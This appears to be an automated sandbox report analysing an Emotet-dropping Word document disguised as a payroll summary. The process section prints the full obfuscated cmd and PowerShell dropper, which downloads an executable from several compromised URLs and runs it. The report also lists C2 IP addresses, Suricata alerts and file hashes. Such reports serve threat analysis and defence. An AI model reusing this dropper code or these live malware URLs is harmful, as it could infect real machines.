9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2408)
-
57463.exe
(PID: 3220)
14/64
- cmnmspthrd.exe (PID: 2240) 14/64
-
57463.exe
(PID: 3220)
14/64
-
powershell.exe
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2408)
-
cmd.exe
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 4016, Additional Context: Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124)))
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
ifcingenieria.cl |
138.0.120.12
TTL: 1499 |
- | Chile |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
138.0.120.12 |
80
TCP |
powershell.exe PID: 2408 |
Chile |
37.120.170.231 |
443
TCP |
cmnmspthrd.exe PID: 2240 |
Germany |
81.21.67.85 |
8080
TCP |
cmnmspthrd.exe PID: 2240 |
United Kingdom |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1
Host: ifcingenieria.cl
Connection: Keep-Alive More Details |
138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1
Host: ifcingenieria.cl
Connection: Keep-Alive 200 OK More Details |
81.21.67.85:8080 | GET | 81.21.67.85/ | GET / HTTP/1.1Cookie: 62407=0mqUhhn6Ge6ZIHkHU3CFqP7xYqej0rGgy+wGw5ndDq8Y7dmCX0C+18pBoXCPgtAI2AHEproTMZTQxYa3eOceuxKqyh1npx8An8iLKyndBa/Y8Il01WMZjWWmaa80aiXHMR2kbeze2Gp/QYLpxFl2h9lrC/EbDA8+MCECMhL+SY3/p9PE0uGMes2MadeydHxmHjs9Vmu0DNJJgHVDAObrjzLwhtwyJk0uKPdKHgMdMlPY+0lHdSuMkdvJTjwYjtcVybE5moUeIkTxLhS36xYp+NFW7H0HCHo2VbKT9VXp1K4nFGaCph+4I7J1wyA2XsEb8DrYkoSk//Txln5mc++AKekbssIuRj0POoRkrbRjGI86Sqq2uMAQrW7xW/LvOWwtZ1v7pWLi5YNW00Ium6x1h4AYn/s=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4... 200 OK More Details |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 81.21.67.85:8080 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet CnC Checkin | 2830701 |
138.0.120.12 -> local:49164 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
138.0.120.12 -> local:49164 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
138.0.120.12 -> local:49164 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
Extracted Strings
Extracted Files
-
Malicious 1
-
-
57463.exe
- Size
- 232KiB (237568 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result
- Labeled as "GenKryptik.BMLF" (14/64)
- Runtime Process
- 57463.exe (PID: 3220)
- MD5
- 35832c2b7c2287d532ee0e0abc1ae5f1
- SHA1
- 253685c4375976ff4b31e5112c82272037ab42e3
- SHA256
- ef7f7e9aef5a6bc1e5b0a3bf476dae6cb2ef48cae4283597c4b5d30ef7fdd8a5
-
-
Clean 1
-
-
~WRD0002.tmp
- Size
- 5.5KiB (5632 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Cannot read section info
- AV Scan Result
- 0/58
- MD5
- 0f570f748eeacf89941ee8a9fb47cd63
- SHA1
- 06465dd291b931826588f00a6ad8ffd4c3b213d2
- SHA256
- e1f37d99490cd216b2fc6fdd9a161b1fa63273f7d0a14de4fff287d8286ca2b0
-
-
Informative 9
-
-
09172 Payroll Summary.LNK
- Size
- 518B (518 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
- b11404498d8c89426a4a5d85bd243370
- SHA1
- 9756b01402e7f458601fd3c68dc19883817c48b9
- SHA256
- 92228da4fe863673ee0bead122b43f48c9f18ffa128c3dd10eca1035d03ef54a
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
- 6e2a1743a37219f4d509c4059614cba9
- SHA1
- 97ef035ed407cd69a19d749dd58d8cbc73dcda5c
- SHA256
- 6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
-
QR3RTP9CEYNQI3ODIF1G.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 2408)
- MD5
- 15ddb3d8662ed7e21c594031682e7b68
- SHA1
- 53b2df953fcac08e6f88a3c92bc02d0401b63a7a
- SHA256
- 4ca7f90985dc96207c7fc8e2be92ef8ebd23e636f44946edd717b0df3cf0a4f3
-
~WRD0000.tmp
- Size
- 44KiB (45056 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Author: Ryfewuja84323, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 19:45:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 5, Security: 0
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
- 436c44134019873484df35e2873944f8
- SHA1
- fb1b95465e7f077dacc790b9930981192831402c
- SHA256
- 0e19cfa277b1a1800e05b2c7e508fec3dd69fc57bc8a7a0bdf940385e613c5cd
-
index.dat
- Size
- 171B (171 bytes)
- Type
- data
- Runtime Process
- cmnmspthrd.exe (PID: 2240)
- MD5
- b31d5d974bf1e459d31dd1a0e7b4f505
- SHA1
- 6fa91f0e73c9f3c996e382882d04383e73378b28
- SHA256
- 2648f11bf17ec2ba950912a455b0712d912329952e614bd00d88dc5505136072
-
~WRS{84ED4C61-472A-4119-8DE6-9124328149A8}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
~$172 Payroll Summary.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2508)
- MD5
- 6e2a1743a37219f4d509c4059614cba9
- SHA1
- 97ef035ed407cd69a19d749dd58d8cbc73dcda5c
- SHA256
- 6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec
-
09172%20Payroll%20Summary.doc.lnk
- Size
- 594B (594 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Thu May 17 20:52:27 2018, mtime=Thu May 17 20:52:27 2018, atime=Thu May 17 20:52:42 2018, length=167424, window=hide
- MD5
- bf579ab8e8675febda19a41a128a8d0a
- SHA1
- 97f6969780b8d5cc608b4a56ae7328d0f6a11c9d
- SHA256
- 1f3ebc3cda7497e3df71182a5e07214863d88c8a7cbbf01d7246692dbcbde717
-
~WRD0003.tmp
- Size
- 44KiB (45056 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Ryfewujashowavae46504, Subject: Ryfewujasho58022, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 17 19:45:00 2018, Last Saved Time/Date: Thu May 17 23:07:00 2018, Number of Pages: 1, Number of Words: 1, Number of Characters: 7, Security: 0
- MD5
- a62259ab4dfb5ac263d60e550581f015
- SHA1
- e3aa842383e704aeeb2bbe95d0294ca7838ddc8b
- SHA256
- 46f66f061d1c6eb59c09c2e5b5e0afba7a44dd54c1ddfff51ab9f3863fe9ea8a
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "~$172 Payroll Summary.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/6051e171b7617fc5e1cb68bcff6b5a2681ed039120209907cf9c947f9b5c08ec/analysis/1526565676/")
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report